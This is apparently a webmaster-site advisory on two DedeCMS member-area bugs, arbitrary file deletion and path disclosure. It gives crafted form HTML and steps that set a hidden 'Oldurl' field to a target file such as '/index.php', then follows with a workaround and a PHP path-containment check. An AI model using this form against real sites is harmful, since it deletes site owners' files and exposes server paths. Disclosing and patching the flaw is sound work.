The latest DedeCMS vulnerability allows any file to be deleted. Dede released its latest patch in May, but that patch does not work. Two bugs are published here:
1. Deletion of any file on the website.
2. Path disclosure.
1. Delete any file.
Register a normal user ... then upload an attachment anywhere the site allows.
Part of the code:
<form class="mTB10 mL10 mR10" name="Form1" action="http://website address/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value=""/>
<input type="hidden" name="mediatype" value="1"/>
<input type="hidden" name="Oldurl" value="file to be deleted"/> <!-- such as value="/index.php" -->
<input type="hidden" name="Dopost" value="Save"/>
<table cellspacing="1" class="Submit">
After the modification is complete, open the HTML page and submit the form directly.
Then click Delete for the attachment in the user's attachment management.
2. Path disclosure.
This also uses the original HTML code.
<td align='right' valign='top'>Replacement attachment:</td>
<td><input name="Addonfile" type="file" id="Addonfile" style="width:300px"/></td>
Delete type="file" from this input, save the page, then open it and submit the form directly.
This discloses the site's path.
Temporary workaround: disable user registration, or prohibit users from uploading attachments.
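A server-side check that would stop a client-supplied path like the hidden field above from reaching files outside a member's upload directory. This is an added example, not DedeCMS code or the vendor's patch; the function name `resolve_attachment_path`, the directory layout and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical helper, not DedeCMS code.
// Resolves a client-supplied attachment path and returns it only when it is a
// regular file inside the given upload directory; otherwise returns null.
function resolve_attachment_path(string $uploadRoot, string $clientPath): ?string
{
    // Reject NUL bytes and empty values before touching the filesystem.
    if ($clientPath === '' || strpos($clientPath, "\0") !== false) {
        return null;
    }
    $root = realpath($uploadRoot);
    if ($root === false || !is_dir($root)) {
        return null;
    }
    // Treat the value as relative to the upload root, never to the web root.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($clientPath, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // realpath() has collapsed "../" and symlinks, so a prefix check is now safe.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo: a temp tree with one upload and one file outside it.
$base = sys_get_temp_dir() . '/attach_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/uploads/member42', 0700, true);
file_put_contents($base . '/uploads/member42/photo.jpg', 'x');
file_put_contents($base . '/index.php', '<?php // site entry point');

$userDir = $base . '/uploads/member42';
foreach (['photo.jpg', '/index.php', '../../index.php', 'missing.jpg'] as $input) {
    $path = resolve_attachment_path($userDir, $input);
    printf("%-18s => %s\n", $input, $path === null ? 'rejected' : 'ok, may delete');
}

// Remove the constructed demo tree.
unlink("$base/uploads/member42/photo.jpg");
unlink("$base/index.php");
rmdir("$base/uploads/member42");
rmdir("$base/uploads");
rmdir($base);
```

A stronger design does not accept the old file path from the client at all and instead looks it up from the stored attachment record for the logged-in owner; the containment check above is then a second layer.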
First published: Poly Station | Webmaster Information http://www.cnjz8.com. If reproduced, please retain the source.